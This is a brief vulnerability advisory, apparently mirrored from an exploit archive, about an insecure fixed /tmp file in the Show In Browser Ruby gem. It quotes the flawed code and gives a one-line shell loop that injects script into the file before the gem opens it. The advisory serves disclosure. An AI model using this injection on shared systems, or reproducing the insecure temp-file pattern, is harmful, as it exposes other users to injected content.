Show In Browser 0.0.3 Ruby Gem File Injection Vulnerability



EKU-ID: 3237 CVE: OSVDB-ID:
Author: Larry Cashdollar Published: 2013-05-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


TITLE: Show In Browser 0.0.3 Ruby Gem /tmp file injection vulnerability.
  
DATE: 5/15/2023
  
AUTHOR: Larry W. Cashdollar (@_larry0)
  
DOWNLOAD: https://rubygems.org/gems/show_in_browser
  
DESCRIPTION: Opens arbitrary text in your browser
  
VENDOR: Jonathan Leung
  
FIX: N/A
  
CVE: 2013-2105
  
DETAILS: The following code uses the temporary file "/tmp/browser.html" insecurely.
  
 2   FILE_LOCATION = "/tmp/browser.html"
  
3 4 class << self 5 6 def show(html)
  
 7       file = File.open(FILE_LOCATION, 'w')
 8       file.write(html)
 9       file.close
10 
11 `open #{FILE_LOCATION}`
  
  
By a malicious user creating /tmp/browser.html first and repeatedly writing to it they can inject malicious html into 
the file right before it is about to be opened.
  
PoC:
  
  
nobody () pitter:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/browser.html; done
  
Will pop up a java script alert in other gem users browser. 
  
ADVISORY: http://vapid.dhs.org/advisories/show_in_browser.html